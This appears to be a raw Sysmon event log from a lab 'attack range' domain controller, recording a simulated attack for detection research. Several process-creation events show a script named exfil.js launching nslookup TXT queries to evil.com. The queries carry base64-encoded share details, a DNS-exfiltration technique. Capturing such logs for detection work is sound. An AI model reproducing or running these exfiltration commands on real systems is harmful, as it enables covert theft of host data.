14:21:29.596{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5843-000000005F02}7632C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208229Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.596{2E1864BB-18E9-629A-5843-000000005F02}76321144C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5743-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208228Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.580{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5843-000000005F02}7632C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208227Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208226Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208225Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208224Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.580{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208223Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.580{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5743-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208222Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.580{2E1864BB-18E0-629A-6742-000000005F02}39764796C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-5743-000000005F02}6824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208221Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.583{2E1864BB-18E9-629A-5743-000000005F02}6824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBJUEMk evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlktiq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208220Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.579{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrrjdm.tmpMD5=74AA98EC4B1C82029578D90E2343E510,SHA256=BCED258190799681E04DEC80A23A2247E8F332523DBBC8B2CBECAB9A40B2F90E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208219Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.543{2E1864BB-18E9-629A-5543-000000005F02}4083316C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5643-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208218Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208217Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208216Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208215Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.543{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208214Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.543{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5643-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208213Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.543{2E1864BB-18E9-629A-5443-000000005F02}48046408C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-5643-000000005F02}2792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208212Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.551{2E1864BB-18E9-629A-5643-000000005F02}2792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-5443-000000005F02}4804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrrjdm.tmp 2>&1 10341000x8000000000000000208211Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.527{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5543-000000005F02}408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208210Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.527{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5543-000000005F02}408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.527{2E1864BB-18E9-629A-5543-000000005F02}4083316C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5443-000000005F02}4804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5543-000000005F02}408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208205Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5443-000000005F02}4804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208204Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208203Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208202Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-18E0-629A-6742-000000005F02}39767076C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-5443-000000005F02}4804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208201Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.515{2E1864BB-18E9-629A-5443-000000005F02}4804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrrjdm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208200Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.512{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlemzzw.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208199Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.480{2E1864BB-18E9-629A-5243-000000005F02}56042608C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5343-000000005F02}7792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208198Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 